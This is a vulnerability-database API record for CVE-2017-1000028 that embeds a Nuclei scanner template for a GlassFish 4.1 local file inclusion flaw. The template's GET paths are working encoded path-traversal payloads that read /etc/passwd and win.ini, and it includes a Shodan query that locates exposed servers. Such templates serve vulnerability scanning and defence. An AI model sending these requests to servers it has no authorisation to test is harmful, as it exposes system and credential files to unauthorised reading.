{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2017-1000028/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2017-1000028/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2017-1000028/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2017-1000028/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2017-1000028/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2017-1000028"},"sightings":{"href":"/api/v1/sightings/cve-2017-1000028"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2017/CVE-2017-1000028.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2017-1000028\n\ninfo:\n  name: Oracle GlassFish Server Open Source Edition 4.1 - Local File Inclusion\n  author: pikpikcu,daffainfo\n  severity: high\n  description: Oracle GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated local file inclusion vulnerabilities that can be exploited by issuing specially crafted HTTP GET requests.\n  impact: |\n    Unauthenticated attackers can read arbitrary files including configuration files, database credentials, and sensitive system files, potentially leading to complete server compromise.\n  remediation: |\n    Apply the necessary patches or updates provided by Oracle to fix the LFI vulnerability in GlassFish Server.\n  reference:\n    - https://www.exploit-db.com/exploits/45196\n    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=18822\n    - https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904\n    - https://www.exploit-db.com/exploits/45196/\n    - https://nvd.nist.gov/vuln/detail/CVE-2017-1000028\n  classification:\n    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2017-1000028\n    cwe-id: CWE-22\n    epss-score: 0.99479\n    epss-percentile: 0.99944\n    cpe: cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*\n  metadata:\n    max-request: 2\n    vendor: oracle\n    product: glassfish_server\n    shodan-query: cpe:\"cpe:2.3:a:oracle:glassfish_server\"\n  tags: cve,cve2017,oracle,glassfish,lfi,edb,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd\"\n      - \"{{BaseURL}}/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini\"\n\n    stop-at-first-match: true\n\n    matchers-condition: or\n    matchers:\n      - type: dsl\n        dsl:\n          - \"regex('root:.*:0:0:', body)\"\n          - \"status_code == 200\"\n        condition: and\n\n      - type: dsl\n        dsl:\n          - \"contains(body, 'bit app support')\"\n          - \"contains(body, 'fonts')\"\n          - \"contains(body, 'extensions')\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 4a0a00473045022100f40251e612288df3652f72ad75afbe7d3aeca3cc54bf706f7d34e570bbea274b02204b22894c0760dc7275b5a1e9a621162368cfb272e1c1d309423559b13507cbfa:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2017-1000028"}